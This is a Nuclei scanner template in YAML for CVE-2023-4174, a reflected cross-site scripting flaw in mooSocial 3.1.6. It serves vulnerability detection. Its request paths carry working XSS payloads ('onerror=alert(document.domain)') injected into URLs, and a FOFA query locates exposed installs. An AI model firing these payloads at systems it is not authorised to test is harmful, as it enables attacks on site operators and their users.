nuclei-templates/http/cves/2023/CVE-2023-4174.yaml

41 lines
1.6 KiB
YAML
Raw Normal View History

2023-08-08 21:02:42 +00:00
id: CVE-2023-4174
info:
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
author: momika233
severity: medium
description: |
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
reference:
- https://www.exploit-db.com/exploits/51671
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
metadata:
max-request: 5
verified: true
fofa-query: icon_hash="702863115"
tags: cve,cve2023,moosocial,xss
http:
- method: GET
path:
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=a onerror=alert(document.domain)>ridxm"
- "mooSocial"
condition: and
- type: word
part: header
words:
- "text/html"